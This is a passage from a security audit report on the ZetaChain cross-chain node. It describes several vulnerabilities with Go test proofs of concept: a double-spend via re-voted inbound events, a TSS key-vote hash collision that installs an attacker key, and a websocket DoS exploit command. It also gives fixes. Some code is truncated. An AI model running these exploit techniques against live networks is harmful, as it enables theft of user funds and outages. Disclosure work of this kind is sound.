This proof of concept demonstrates the issue from the Cosmos SDK tests. It sends two events that only differ by the GasLimit and checks if they get approved or not. To make the proof of concept more viable, you could simulate a change on the zetaclient parameters and send a proof through the TxInTracker afterwards. Since this requires a change to the zetaclient live, we felt that a Cosmos SDK PoC was clearer to reproduce and easier to understand.

  1. Copy the following code into the location repos/node/x/crosschain/keeper/keeper_cross_chain_tx_vote_inbound_tx_test.go.
package keeper_test

import (

	sdkmath "cosmossdk.io/math"
	sdk "github.com/cosmos/cosmos-sdk/types"
	keepertest "github.com/zeta-chain/zetacore/testutil/keeper"
	observerTypes "github.com/zeta-chain/zetacore/x/observer/types"
	observertypes "github.com/zeta-chain/zetacore/x/observer/types"

Potential Double Event Submission
func TestNoDoubleEventProtections(t *testing.T) {
	k, ctx, _, zk := keepertest.CrosschainKeeper(t)

	// MsgServer for the crosschain keeper
	msgServer := keeper.NewMsgServerImpl(*k)

	// Set the chain ids we want to use to be valid
	params := observertypes.DefaultParams()
		ctx, params,

	// Convert the validator address into a user address.
	validators := k.StakingKeeper.GetAllValidators(ctx)
	validatorAddress := validators[0].OperatorAddress
	valAddr, _ := sdk.ValAddressFromBech32(validatorAddress)
	addresstmp, err := sdk.AccAddressFromHexUnsafe(hex.EncodeToString(valAddr.Bytes()))
	validatorAddr := addresstmp.String()

	// Add validator to the observer list for voting
	chains := zk.ObserverKeeper.GetParams(ctx).GetSupportedChains()
	for _, chain := range chains {
		zk.ObserverKeeper.SetObserverMapper(ctx, &observertypes.ObserverMapper{
			ObserverChain: chain,
			ObserverList:  []string{validatorAddr},

	// Vote on the FIRST message.
	msg := &types.MsgVoteOnObservedInboundTx{
		Creator:       validatorAddr,
		Sender:        "0x954598965C2aCdA2885B037561526260764095B8",
		SenderChainId: 1, // ETH
		Receiver:      "0x954598965C2aCdA2885B037561526260764095B8",
		ReceiverChain: 7000, // zetachain
		Amount:        sdkmath.NewUintFromString("10000000"),
		Message:       "",
		InBlockHeight: 1,
		GasLimit:      1000000000,
		InTxHash:      "0x7a900ef978743f91f57ca47c6d1a1add75df4d3531da17671e9cf149e1aefe0b",
		CoinType:      0, // zeta
		TxOrigin:      "0x954598965C2aCdA2885B037561526260764095B8",
		Asset:         "",
		EventIndex:    1,
	_, err = msgServer.VoteOnObservedInboundTx(
	assert.Equal(t, err, nil)

	// Check that the vote passed
	ballot, _, _ := zk.ObserverKeeper.FindBallot(ctx, msg.Digest(), zk.ObserverKeeper.GetParams(ctx).GetChainFromChainID(msg.SenderChainId), observerTypes.ObservationType_InBoundTx)
	if ballot.BallotStatus == observerTypes.BallotStatus_BallotFinalized_SuccessObservation {
		fmt.Println("First ballot passed!")
	} else {
		fmt.Println("First ballot failed!")

	//Perform the SAME event. Except, this time, we resubmit the event.
	msg2 := &types.MsgVoteOnObservedInboundTx{
		Creator:       validatorAddr,
		Sender:        "0x954598965C2aCdA2885B037561526260764095B8",
		SenderChainId: 1,
		Receiver:      "0x954598965C2aCdA2885B037561526260764095B8",
		ReceiverChain: 7000,
		Amount:        sdkmath.NewUintFromString("10000000"),
		Message:       "",
		InBlockHeight: 1,
		GasLimit:      1000000001, // <---- Change here
		InTxHash:      "0x7a900ef978743f91f57ca47c6d1a1add75df4d3531da17671e9cf149e1aefe0b",
		CoinType:      0,
		TxOrigin:      "0x954598965C2aCdA2885B037561526260764095B8",
		Asset:         "",
		EventIndex:    1,

	fmt.Println("Vote again with the same TxHash")
	_, err = msgServer.VoteOnObservedInboundTx(

	assert.Equal(t, err, nil)

	fmt.Println("Treated as a separate event.")
	fmt.Println("In many years, things may change... GasLimit, message, asset... If any of these change, a double spend is possible. Since thesea are not guarenteed to stay the same, this is worrisome.")
	fmt.Println("With the InTrackerTx being possible via a proof, this allows arbitrary users to do this as well.")

	// Get all cross chain TXs
	cctxs := k.GetAllCrossChainTx(ctx)
	_ = cctxs

	cctx1 := cctxs[0]
	cctx2 := cctxs[1]

	// Ensure that the status's have completed.
	assert.Equal(t, cctx1.CctxStatus.Status, types.CctxStatus_OutboundMined)
	assert.Equal(t, cctx1.CctxStatus.Status, cctx2.CctxStatus.Status)

	fmt.Println("Msg Digest Difference: ", msg.Digest(), msg2.Digest())
	assert.NotEqual(t, msg.Digest(), msg2.Digest())

	// Checking that the two hashes are the same
	assert.Equal(t, cctx1.InboundTxParams.InboundTxObservedHash, cctx2.InboundTxParams.InboundTxObservedHash)
  1. Run the command go test -v ./x/crosschain/keeper/ -run TestNoDoubleEventProtections.
  2. Notice that even though a single value of the incoming TX has changed, the vote for the TX passes.

Short Term Remediation

The obvious solution would be to remove fields that can change over time from the message. This way, small changes do not change the voting index and compromise the duplicate event submission check. However, this does NOT work because it would allow the finalizing vote to set many of the fields, which would be bad.

So, it is recommended to have a separate structure for keeping track of events that have already occurred besides the voting process that is specific index for an event. For instance, the tx hash, event id and chain id are a great way to verify that an event occurred already to guarantee that the same event is not trying to be added again.

Long Term Remediation

Defense in depth measures can be put in place to secure this more.

An obvious one is having a timeout. For instance, maximum blocks between events or a week of actual time. This would limit the scope of the exploit to only recent changes.

Another one would be introducing a version scheme for each change the message. On the event voting side, only allowing for specific versions past a specific point would ensure that old ballots could not be resubmitted.

Rigorous testing to ensure that old transactions are the same compared to new ones. If a library is upgraded, a byte is dropped or anything else, then a different index will be created, resulting in lost funds.

lumtis (ZetaChain) confirmed

[H-13] User funds can be lost in favor of Zeta protocol during a CCTX due to contracts being paused

Submitted by dontonka, also found by lsaudit



Observer take care of inbound/outbound CCTX in Zeta ecosystem. For EVM chains, it works with 3 smart contracts which are deployed on the external EVM chain:

  • ZetaConnectorEth.sol: entry point —> client calls send —> ZetaSent log
  • ZetaConnectorNonEth.sol: entry point —> client calls send —> ZetaSent log
  • ERC20Custody.sol: entry point —> client calls deposit —> Deposited log

In case of emergency, these contracts can be paused by calling their corresponding pause() function. The assumption would be that they are paused on both the inbound and outbound EVM chains, as otherwise there will be always inbounds CCTX coming in, and that will result more complex to manage. Since the 3 functions mention above are gated by whenNotPaused, whenever a contract is paused, it will prevent any inbounds cctx from coming in.

There is a key problem in the moment with this scenario: onRevert is gated with whenNotPaused while onReceive is not. This means whenever the contracts are paused (on both chains), the pending CCTX still need to be processed before any migration can happen (eg: migrating TSS). This is the specific reason why onReceive is not being gated with whenNotPaused, but since onRevert is gated, a revert in onReceive would kick-off the refund mecanism, which will call onRevert on the originating chain but that will always revert if the contract is also paused.


User funds can be lost in favor of Zeta protocol during a CCTX due to contracts being paused.

Proof of Concept

Let’s consider the CCTX flow described in the whitepaper as follow for Cross-Chain Message Passing.

Let’s consider a pending CCTX between BSC and ETH chains in a context of an emergency situation where contracts on both BSC and ETH are paused, but our CCTX had already generated his ZetaSent event, awaiting to be processed/voted/finalized by the Observers, so it’s pending, and now still need to be fully processed while the contracts are paused.

  • At step 5, this is where the onReceive is being called against ZetaConnector*.sol. But user has a bad luck and unfortunatelly, that revert (eg: caused by onZetaMessage).
  • At step 9, the refund mechanism will be triggered.
  • At step 11, this is when onRevert will be called. Since the BSC ZetaConnector*.sol is also paused, this will revert right away (caused by whenNotPaused), and at step 14 failure will be confirmed, hence funds will not be refunded to the user in the end and remain in Zeta protocol, which is effectivaly user funds lost.

Cross-Chain Message Passing flow

  1. An end user interacts with a Contract C1 on Chain A.
  2. The interaction leaves an event or transaction memo, with user specified [chainID,

contractAddress, message]. (the message is arbitrarily encoded application data in binary format. 3. ZetaChain observers (in zetaclient) pick up this event/memo and report to zetacore, which verifies the inbound transaction. 4. zetacore modifies the CCTX (cross-chain tx) state variable with OutboundTxParams which instructs the TSS signers (in zetaclient) to build, sign, and broadcast external transaction. 5. The zetaclient TSS signers observe the OutboundTxParams in the CCTX, and build outbound tx, enter into a TSS keysign ceremony to sign the transaction, and then broadcast the signed transaction to the external blockchains. For CCMP, the outbound transaction is mainly calling the user specified contract with specified addresses and parameters. 6. The CCTX structure also tracks the stages/status of the cross-chain transaction. 7. Once the broadcasted transaction is included in one of the blocks (said to be “mined” or “confirmed”), zetaclients will report such confirmation to zetacore, which will update the CCTX status. 8. If the “confirmed” outbound transaction was successful, the CCTX status becomes OutboundMined, and the CCTX is considered in its terminal state and will not be updated anymore. This CCTX processing is completed. 9. If the “confirmed” outbound transaction is failure (e.g. revert on Ethereum chains), then the CCTX will updates it status to PendingRevert if possible, or Aborted if revert is not possible. The CCTX processing is completed if it goes to Aborted status. 10. If the new status is “PendingRevert”, a second OutboundTxParams should be already in the CCTX, which instructs the zetaclients to create a “Revert” outbound tx to the incoming chain & contract, allowing the incoming contract to implement a application level revert function to cleanup contract state. 11. The zetaclients will build the revert transaction, enter into TSS keysign ceremony to sign the transaction, and broadcast to the incoming blockchain (Chain A in this case). 12. Once the revert transaction is “confirmed” on Chain A, the zetaclients will report the transaction status to zetacore. 13. If the revert transaction is successful, the CCTX status becomes Reverted, and the CCTX processing is completed. 14. If the revert transaction is failure, the CCTX status becomes Aborted, and the CCTX processing is completed.

Whenever contracts are paused in case of emergency, in order to properly complete the pending CCTXs, the entire CCTX flow must be active, which include the refund mechanism.

By removing the whenNotPaused on onRevert function, that will resolve the problem, so I would recommend the following change in ZetaConnectorEth.sol and ZetaConnectorNonEth.sol

    function onRevert(
        address zetaTxSenderAddress,
        uint256 sourceChainId,
        bytes calldata destinationAddress,
        uint256 destinationChainId,
        uint256 remainingZetaValue,
        bytes calldata message,
        bytes32 internalSendHash
-    ) external override whenNotPaused onlyTssAddress {
+    ) external override onlyTssAddress {

lumtis (ZetaChain) commented:

This is a valid issue.

0xean (Judge) commented:

Since the pause state is meant to be utilized in the course of normal operations (updating the TSS address for example), I think H is actually warranted.

Note: See full discussion here.

[H-14] TSS Key Voting Hash Collision

Submitted by ChristiansWhoHack, also found by ciphermarco (1, 2)

The Observer role is somewhat sensitive but a single observer should not be able to influence a single action to happen. There are multiple observers with parts of the TSS key that vote on events occurring on other chains. From the documentation, “Its important to ensure that at no time is any single entity or small fraction of nodes able to sign messages on behalf of ZetaChain on external chains”.

When an observer is added, an observer is removed or the admin simply asks, the TSS key is regenerated. The full flow of this is explained below:

  1. Start keygen is triggered.
  2. Zetaclient does the key generation process with the other observers.
  3. Observers vote on the new public key via the CreateTSSVoter message to Zetachain.
  4. The vote passes once 100% of Observers have voted. This updates the TSS address on Zetachain, which is then used by the Zetaclient and many other things.
  5. MigrateTSSFunds message is sent to transfer funds from the old address to the new one for each chain, which is only callable by an admin group.
  6. TSS address is updated on all chains manually for the ERC20Custody contract and Connectors by the admin.
  7. Admin turns on inbound transactions.
  8. Everything should be functional again.

Since the TSS (threshold signature) contains all of the funds for the various blockchains (BTC, ETH, etc.) and has complete power to perform actions on the Connector contract, this process must be done securely.

The voting process for this has a catastrophic flaw: the hash used for the voting index does NOT include the public key being voted on. Since this hash is what determines if two votes are the same, the final observer can submit a public key that will be used as the voted on key. The TSS voting requires 100% of voters to agree, making it trivial to time this as the last voter.

If an attacker exploits this, the MigrateTSSFunds message will send all of the TSS value (BTC, ETH, etc.) to an attacker controlled address. Additionally, the TSS address will be used for parsing events and for access control on the connector contract, allowing for complete compromise of these as well transactions as well. So, practically all funds are possible to steal and funds can be created out of thin air.

Proof of Concept

The proof of concept below was added into the msg_tss_voter_test.go file under the x/crosschain/keeper/ path. This creates 4 observers and the final observer submits the malicious public key. Since the vote passes and the TSS address is replaced, this will be used by the zetaclient for future operations and by the admin on the MigrateTSSFunds call.

To run, use the command go test -v ./x/crosschain/keeper/ -run TestTssHashCollision.

package keeper_test

import (

	keepertest "github.com/zeta-chain/zetacore/testutil/keeper"
	observerTypes "github.com/zeta-chain/zetacore/x/observer/types"
	observertypes "github.com/zeta-chain/zetacore/x/observer/types"

func TestTssHashCollision(t *testing.T) {

	// List of observers to use for voting
	observer1Address := "zeta1w5czgpk5kc9etxw2anzhr0uyrr4fqks32qmk6k"
	observer2Address := "zeta1w8qa37h22h884vxedmprvwtd3z2nwakxu9k935"
	observer3Address := "zeta1hk05v9len8u0c2xrwxgfknvcskpd4vncm7ehch"
	observer4Address := "zeta1g323lusfa9qqvjvupajre2dphuem999fahc086"

	observers := []string{observer1Address, observer2Address, observer3Address, observer4Address}

	k, ctx, _, zk := keepertest.CrosschainKeeper(t)

	msgServer := keeper.NewMsgServerImpl(*k)

		Setup various things for testing
	// Set the chain ids we want to use to be valid
	params := observertypes.DefaultParams()
		ctx, params,

	// Add validator to the observer list for voting
	// Normally happens within MsgAddObserver
	chains := zk.ObserverKeeper.GetParams(ctx).GetSupportedChains()
	for _, chain := range chains {
		zk.ObserverKeeper.SetObserverMapper(ctx, &observertypes.ObserverMapper{
			ObserverChain: chain,
			ObserverList:  []string{observer1Address, observer2Address, observer3Address, observer4Address},
	// Add to privileged node list. Normally happens within MsgAddObserver
	for _, address := range observers {
		pubkeySet := common.PubKeySet{Secp256k1: "", Ed25519: ""}
		zk.ObserverKeeper.SetNodeAccount(ctx, observerTypes.NodeAccount{
			Operator:       address, // Make the same as the things above later..
			GranteeAddress: address,
			GranteePubkey:  &pubkeySet,                      // DK
			NodeStatus:     observerTypes.NodeStatus_Active, // DK

	// Turn on the keygen process for a moment
	item := observerTypes.Keygen{
		BlockNumber: 10,
	zk.ObserverKeeper.SetKeygen(ctx, item)

	// List of messages to use
	msg := &types.MsgCreateTSSVoter{
		Creator:          observer1Address,
		TssPubkey:        "Key1", // Key1
		KeyGenZetaHeight: 3,
		Status:           common.ReceiveStatus_Success,
	msg2 := &types.MsgCreateTSSVoter{
		Creator:          observer2Address,
		TssPubkey:        "Key1", // Key2 - different than key1!
		KeyGenZetaHeight: 3,
		Status:           common.ReceiveStatus_Success,
	msg3 := &types.MsgCreateTSSVoter{
		Creator:          observer3Address,
		TssPubkey:        "Key1", // Key2 - different than key1!
		KeyGenZetaHeight: 3,
		Status:           common.ReceiveStatus_Success,
	msg4 := &types.MsgCreateTSSVoter{
		Creator:          observer4Address,
		TssPubkey:        "MaliciousKeyThatOnlyIVotedOn", // Key2 - different than key1!
		KeyGenZetaHeight: 3,
		Status:           common.ReceiveStatus_Success,

	if msg.Digest() == msg4.Digest() {
		fmt.Println("Voting hash collision!")
	fmt.Println("Msg.digest() on msg1 and msg4- ", msg.Digest(), msg4.Digest())
	fmt.Println("Msg1: ", msg)
	fmt.Println("Msg4: ", msg4)

	// Currently failing
	res, err := msgServer.CreateTSSVoter(
	res2, err2 := msgServer.CreateTSSVoter(
	res3, err3 := msgServer.CreateTSSVoter(

	res4, err4 := msgServer.CreateTSSVoter(

	fmt.Println(res, err)
	fmt.Println(res2, err2)
	fmt.Println(res3, err3)
	fmt.Println(res4, err4)

	// Show that the vote for the given digest passed
	ballot, _ := zk.ObserverKeeper.GetBallot(ctx, msg.Digest())
	fmt.Println("Ballot: ", ballot)

	// KeyGen information. Passed with our information

	fmt.Println("Showing off the malicious key")
	tss, _ := k.GetTSS(ctx)
	fmt.Println("PublicKey: ", tss.TssPubkey)

Output of the test being ran:

=== RUN   TestTssHashCollision
Voting hash collision!
Msg.digest() on msg1 and msg4-  3-tss-keygen 3-tss-keygen
Msg1:  creator:"zeta1w5czgpk5kc9etxw2anzhr0uyrr4fqks32qmk6k" tss_pubkey:"Key1" keyGenZetaHeight:3 status:Success 
Msg4:  creator:"zeta1g323lusfa9qqvjvupajre2dphuem999fahc086" tss_pubkey:"MaliciousKeyThatOnlyIVotedOn" keyGenZetaHeight:3 status:Success 
Ballot:  {3-tss-keygen 3-tss-keygen [zeta1g323lusfa9qqvjvupajre2dphuem999fahc086 zeta1hk05v9len8u0c2xrwxgfknvcskpd4vncm7ehch zeta1w5czgpk5kc9etxw2anzhr0uyrr4fqks32qmk6k zeta1w8qa37h22h884vxedmprvwtd3z2nwakxu9k935] [SuccessObservation SuccessObservation SuccessObservation SuccessObservation] TSSKeyGen 1.000000000000000000 BallotFinalized_SuccessObservation 1}
{KeyGenSuccess [] 1} true
Showing off the malicious key
{MaliciousKeyThatOnlyIVotedOn [] [zeta1g323lusfa9qqvjvupajre2dphuem999fahc086 zeta1hk05v9len8u0c2xrwxgfknvcskpd4vncm7ehch zeta1w5czgpk5kc9etxw2anzhr0uyrr4fqks32qmk6k zeta1w8qa37h22h884vxedmprvwtd3z2nwakxu9k935] 1 3}
PublicKey:  MaliciousKeyThatOnlyIVotedOn
--- PASS: TestTssHashCollision (0.01s)
  • Use the publicKey being submitted as part of the hash. In fact, just including all parts of the message (besides the creator and yes/no vote) should be added in to ensure the security of the platform.
  • Many of the other locations simply take a hash of the message minus a few fields, such as here

lumtis (ZetaChain) confirmed

Medium Risk Findings (34)

[M-01] Gas Coin Setup Result In Immediate Profitable Arbitrage

Submitted by MevSec

A gas coin can be added by running the DeployFungibleCoinZRC20 message. This is most notably done when adding a new blockchain support, because each of them has their respective supported “gas ZRC20” which is the native token of this newly supported blockchain as a ZRC compliant token on Zetachain. These liquidity pools are required because we need to be able to get those “gas ZRC20” at some point in order to burn them to redeem them for an equivalent amount of native tokens.

If this new blockchain that is supported is Polygon, then we will deploy a liquidity pool with 0.1 WZETA and 0.1 zrc20-MATIC on deployment so validators can swap these ZETA tokens for the Polygon’s native token.

From the code:

// If this is a gas coin, the following happens:
// * ZRC20 contract for the coin is deployed
// * contract address of ZRC20 is set as a token address in the system
// contract
// * ZETA tokens are minted and deposited into the module account
// * setGasZetaPool is called on the system contract to add the information
// about the pool to the system contract
// * addLiquidityETH is called to add liquidity to the pool

Which calls the SetupChainGasCoinAndPool function.

This is not an issue for low value tokens, but is for tokens such as BTC, ETH, and SOL. If we take the example of BTC, with 0.1 BTC having a value of ~4400$ being added with a ZETA token which is going to make the pool imbalanced with a significant value at stake.

An arbitrage opportunity will be created as a first come first serve rule, which is going to be a net loss for the protocol because these “gas ZRC20” can be directly redeemed for native tokens on the blockchain by users by withdrawing the assets later.

Someone could then monitor for new blockchains supported by Zetachain and if the token valuation is extremely disparate compared to the ZETA token, they could backrun the liquidity add by swapping some ZETA tokens and make an instant profit.

In this command, we ask for the token0 name of the pair 0 which is the ETH ZRC20 gas token:

$ cast call $(cast call $(cast call 0x9fd96203f7b22bCF72d9DCb40ff98302376cE09c "allPairs(uint256)(address)" 0) "token0()(address)") "name()(string)"

And we can also verify that the balance of each assets in the reserves is 0.1:

$ cast call $(cast call 0x9fd96203f7b22bCF72d9DCb40ff98302376cE09c "allPairs(uint256)(address)" 0) "getReserves()(uint112,uint112,uint32)"
100000000000000000 [1e17]
100000000000000000 [1e17]
1702765357 [1.702e9]

Next, let’s check for BTC:

$ cast call $(cast call $(cast call 0x9fd96203f7b22bCF72d9DCb40ff98302376cE09c "allPairs(uint256)(address)" 1) "token1()(address)") "name()(string)"

Make sure that 0.1 BTC is in the reserves:

$ cast call $(cast call 0x9fd96203f7b22bCF72d9DCb40ff98302376cE09c "allPairs(uint256)(address)" 1) "getReserves()(uint112,uint112,uint32)"
100000000000000000 [1e17]
10000000 [1e7]
1702765357 [1.702e9]

Before adding a new blockchain and a gas token, you could either add much less initial liquidity such as a mantissa of -3 to make the BTC amount much less profitable, or make the initial liquidity configurable from the message passing.

lumtis (ZetaChain) confirmed

0xean (Judge) decreased severity to Medium

[M-02] JSON-RPC DoS through Websockets

Submitted by MevSec

The Websocket service accepts messages for 32MB size.

File: repos\node\rpc\websockets.go

const (
	messageSizeLimit = 32 * 1024 * 1024 // 32MB


This size is 3 times bigger than what Golang accepts by default (10MB) on the HTTP service, while there is no reason that websocket payloads are bigger than HTTP payloads. In addition, there is no rate limiting within the code for the websockets.

As a consequence, an external attacker can take down the JSON RPC server by :

  • Opening a websocket RPC Connection to Zetachain through Websockets.
  • Sending in loop, with parallel workers, malicious Websockets messages (with an unknown method) and a total message size of 32MB.


When the WebSocket server runs, it listens to the messages with readLoop() (L211).

When a message is received, the message body is put in mb variable. (L222)

This content will then be used to instance a msg variable.

File: repos\node\rpc\websockets.go

_, mb, err := wsConn.ReadMessage()
var msg map[string]interface{}
		if err = json.Unmarshal(mb, &msg); err != nil {
			s.sendErrResponse(wsConn, err.Error())

Afterwards, some other variables are defined:

  • method - msg[“method”]
  • id - msg[“id”]

Depending on the “method”, a switch case will determine the execution path. If the method is unknown, a call is done to tcpGetAndSendResponse():

File: repos\node\rpc\websockets.go

			// otherwise, call the usual rpc server to respond
			if err := s.tcpGetAndSendResponse(wsConn, mb); err != nil {
				s.sendErrResponse(wsConn, err.Error())

This tcpGetAndSendResponse function will call the RPC, locally with HTTP:

File: repos\node\rpc\websockets.go

func (s *websocketsServer) tcpGetAndSendResponse(wsConn *wsConn, mb []byte) error {
	req, err := http.NewRequestWithContext(context.Background(), "POST", "http://"+s.rpcAddr, bytes.NewBuffer(mb))
	if err != nil {
		return errors.Wrap(err, "Could not build request")

However, this function does not perform any sanitation check. If an attacker sends a 32Mb message on Websockets, it will internally forward the call to the HTTP server with 32Mb payload.

Proof of Concept

A PoC was developed to exploit the vulnerability with :

  • 14MB incorrect method name eth_XYZ where XYZ is a random 14MB string,

    The interest in using this function is that the server will attempt to send back the name of the method that was not found, sending therefore an extra 14MB back to the client.

  • 14MB payload (random string)
  • Only non-ASCII characters in the payload since it seems to cause more problems on the server upon decoding.
  • 30 workers from a single machine

The PoC can be found here : https://gist.github.com/0xfadam/2846ee14d67ea95741f27e50570ac77a

The PoC can be launch with the following commands:

go mod init poc
go mod tidy
go run poc.go -ip -ws-port 9546 -secure=false -workers 30

A video showing the crash of the server after exploitation can be found below :


The Zetachain server needs to:

  • Limit the size of each message. It should be the same what is configured for HTTP (10 MB)
  • Enforce an applicative rate-limit mechanism so a single client cannot send thousands of messages within a short timeframe.

lumtis (ZetaChain) confirmed

0xean (Judge) decreased severity to Medium and commented:

Warden fails to show how this leads to a direct loss of funds. DOS is considered Medium severity.

[M-03] AddToInTxTracker doens’t allow permissionless tx validation for Bitcoin chain, InTxTracker permissionless tx validation for Bitcoin chain will always fail

Submitted by oakcobalt

Permissionless tx validation for EVM and Bitcoin chain should be supported based on audit doc→ The system is currently implemented for Ethereum/BSC and Bitcoin. However, currently permissionless tx validation for EVM and Bitcoin chain are only supported in AddToOutTxTracker, but not supported in AddToInTxTracker. Permissionless validation for InTx for bitcoin chain will always fail.

Proof of Concept

In AddToInTxTracker() from msgserveraddtointx_tracker.go, chain is incorrectly diverted. The bitcoin chain is missing and will return an error.

func (k msgServer) AddToInTxTracker(goCtx context.Context, msg *types.MsgAddToInTxTracker) (*types.MsgAddToInTxTrackerResponse, error) {
		if common.IsEVMChain(msg.ChainId) {
			err = k.VerifyEVMInTxBody(ctx, msg, txBytes)
			if err != nil {
				return nil, types.ErrTxBodyVerificationFail.Wrapf(err.Error())
} else {
               //@audit when ChainId is bitCoin chain, this will return an error
|>			return nil, types.ErrTxBodyVerificationFail.Wrapf(fmt.Sprintf("cannot verify inTx body for chain %d", msg.ChainId))


Notice in AddToOutTxTracker(), bitcoin chain is correctly diverted with else if common.IsBitcoinChain(msg.ChainId)statement.

In AddToInTxTracker(), add IsBitcoinChain(msg.ChainId) to correctly handle when chainId is bitcoin chain.

oakcobalt (Warden) commented:

(1) According to doc, both AddToInTxTracker and AddToOutTxTracker are supported for permissionless validation and both should support bitcoin chain and EVM chain. So IMO, the lookout’s quote supports the validity of this report.

An inbound/outbound tx can be sent by anyone with a proof. The proof is checked against the header of the chain to validate it → The system is currently only used to validate txs to be added in the tracker through MsgAddToInTxTracker and MsgAddToOutTxTracker and not to validate txs to be observed as part of the ZetaChain cross-chain tx workflow → The system is currently implemented for Ethereum/BSC and Bitcoin

Note that this issue concerns only MsgAddToInTxTracker and MsgAddToOutTxTracker, and doens’t concern validate txs to be observed as part of the ZetaChain cross-chain tx workflow. The latter is part of keeper -> voteinboundtx / voteoutboundtx flow, which is irrelevant to this discussion.

(2)This report argues that AddToInTxTracker() is flawed because it currently will revert when the chain is Bitcoin. For reference, AddToOutTxTracker() currently correctly supports both Bitcoin chain and EVM chain. This means AddToInTxTracker() needs to be fixed to support both chains.

a) AddToInTxTracker() : This reverts when the chain is Bitcoin

func (k msgServer) AddToInTxTracker(goCtx context.Context, msg *types.MsgAddToInTxTracker) (*types.MsgAddToInTxTrackerResponse, error) {
		if common.IsEVMChain(msg.ChainId) {
			err = k.VerifyEVMInTxBody(ctx, msg, txBytes)
} else {
               //@audit when ChainId is bitCoin chain, this will return an error
|>			return nil, types.ErrTxBodyVerificationFail.Wrapf(fmt.Sprintf("cannot verify inTx body for chain %d", msg.ChainId))


b) AddToOutTxTracker(): This supports both bitcoin and evm chains

func (k msgServer) AddToOutTxTracker(goCtx context.Context, msg *types.MsgAddToOutTxTracker) (*types.MsgAddToOutTxTrackerResponse, error) {
	chain := k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(msg.ChainId)
	if msg.Proof != nil { // verify proof when it is provided
|>		err = k.VerifyOutTxBody(ctx, msg, txBytes)
		if err != nil {
			return nil, types.ErrTxBodyVerificationFail.Wrapf(err.Error())
		isProven = true

func (k Keeper) VerifyOutTxBody(ctx sdk.Context, msg *types.MsgAddToOutTxTracker, txBytes []byte) error {
	// verify message against transaction body
	if common.IsEVMChain(msg.ChainId) {
		err = VerifyEVMOutTxBody(msg, txBytes, tss.Eth)
        //@audit-info note: this supports both chains
|>	} else if common.IsBitcoinChain(msg.ChainId) {
		err = VerifyBTCOutTxBody(msg, txBytes, tss.Btc)
	} else {
		return fmt.Errorf("cannot verify outTx body for chain %d", msg.ChainId)


0xean (Judge) commented:

@oakcobalt - Thanks for raising this. I agree it’s not handled correctly for BTC on the input flow AND it does state that it should in the audit docs. There is of course a work around (using the permissioned flow). That being said since the sponsor call out this new flow as being important, I think it probably warrants M. Lets get @lumtis to provide an opinion here on severity before we finalize it all.

lumtis (ZetaChain) confirmed and commented:

Yes, Bitcoin should be added here.

0xean (Judge) commented:

Thanks all, Medium it is.

[M-04] AddBlockHeader Cannot Cope with Reorgs

Submitted by ciphermarco

AddBlockHeader handles adding a block header to the node’s store, through majority voting of observers. Reorgs happen, at different rates and depths for different chains and network conditions, but they do happen. And not only defensive measures must be taken to deal with them, but also remediation measures in case they occur more aggressively than expected. The problem is that a critical function to remove or reorganise the blocks is somehow missing from the external interface.

This submission is not about the estimation of financial loss or impact of reorgs, but the clear technical fact that blocks cannot be removed out of the store or somehow reorganised in case of emergency.

Proof of Concept

The AddBlockHeader function is only called by observers after a certain number of confirmations is reached in the clients; 2 for Bitcoin, 14 for Ethereum, and 14 for BSC. As I intend to submit this topic in a Low/QA report, in this submission I will ignore that I find those confirmation numbers dangerously low for a software like ZetaChain.

Though, even if we consider that chances of reorgs past those confirmation numbers are low, they occur. And when they do occur beyond the expected safety parameters, and depending on the reorg depth, ZetaChain cannot possibly avoid the resultant financial damage. But there must be a plan in place and critical functions available to deal with the necessary actions to guarantee operational continuity. And none could be found. There is only a keeper function RemoveBlockHeader, but, oddly, this is not used anywhere in the codebase.

Currently, ZetaChain cannot operate normally if there is need to remove or reorganise some block(s) in the store. For example, suppose there is a reorg beyond the clients’ (very minimal) safety parameters and the block headers have already been added. Financial damage may be inevitable, but observers should be able to vote on a solution to the conundrum so ZetaChain can continue to extend its consensus about the connected chains. What happens if observers try to use AddBlockHeader to vote in a new version of the chain, by attempting to add a block header for the height that has just been added? The function will return an error:

		if msg.Height != bhs.LatestHeight+1 {
			return nil, cosmoserrors.Wrap(types.ErrNoParentHash, fmt.Sprintf("invalid block height: wanted %d, got %d", bhs.LatestHeight+1, msg.Height))

While most checks will pass, the check that the block header being added is of height equal to latest height plus one will not, and the block will not be added. There are a couple of hacky ways to force the block to be added with wrong parameters. But that would not be a seriously designed remediation measure. Fundamentally, operations regarding the affected chain will be halted.

There must be a function, be it through observers voting or admin group action, to account for the possible reorganisation of the chain.

The RemoveBlockHeader function may be used:

// RemoveBlockHeader removes a block header from the store
func (k Keeper) RemoveBlockHeader(ctx sdk.Context, hash []byte) {
	store := prefix.NewStore(ctx.KVStore(k.storeKey), types.KeyPrefix(types.BlockHeaderKey))

Though, there must be a logic somewhere, maybe in the RemoveBlockHeader message server’s function, to also take care of the BlockHeaderState when a block is removed from the store.

Alternatively, altere the AddBlockHeader to accept voting for an earlier height, so the block headers can be reorganised to mirror the chain reorg.

ciphermarco (Warden) commented:

The point of my issue is that there’s nothing implemented for re-organising blocks in case of need. Neither of the keeper functions RemoveBlockHeader and SetBlockHeader are exposed by the message server to be used by the consensus operations to swap blocks in the storage in case of reorgs.

This is also not a theoretical issue about the impact of very specific or deep reorgs types. Small reorgs are inevitable and a normal occurrence in this case, and the core of the issue is that there is no implemented way for peers to cope with that and reach consensus for a new tip block. More specifically, as presented above, AddBlockHeader only allows new blocks to be one above the latest block’s height (msg.Height != bhs.LatestHeight+1), completely blocking any attempt to reach consensus for a new tip.

Thank you for reviewing this.

brewmaster012 (ZetaChain) commented:

Thanks for the report. This is a valid issue however the severity/impact is low as we do not currently rely on block headers and there is no path of exploit.

ciphermarco (Warden) commented:

we do not currently rely on block headers

Without trying to infer intentions from the code itself, the Important Areas documentation for this audit reads:

A new architecture has been developed in order to validate txs from external chains permissionlessly instead of requiring observers to vote on each of them.

  • Observer votes on block headers of the external chains instead of the txs. The block headers are stored on-chain on ZetaChain
  • An inbound/outbound tx can be sent by anyone with a proof. The proof is checked against the header of the chain to validate it

I think the documentation disagrees with this statment and that’s all I can fairly work with for the audit. Of course, unless I misunderstood the documentation.

there is no path of exploit

There are ” hypothetical attack paths with stated assumptions, but external requirements.”, but I don’t show any in my report, so I will not argue for them now. I was focusing on the more easily provable type of impact in this issue, as highlighted below:

2 — Med: ~Assets not at direct risk, but~ the function of the protocol or its availability could be impacted, ~or leak value with a hypothetical attack path with stated assumptions, but external requirements.~

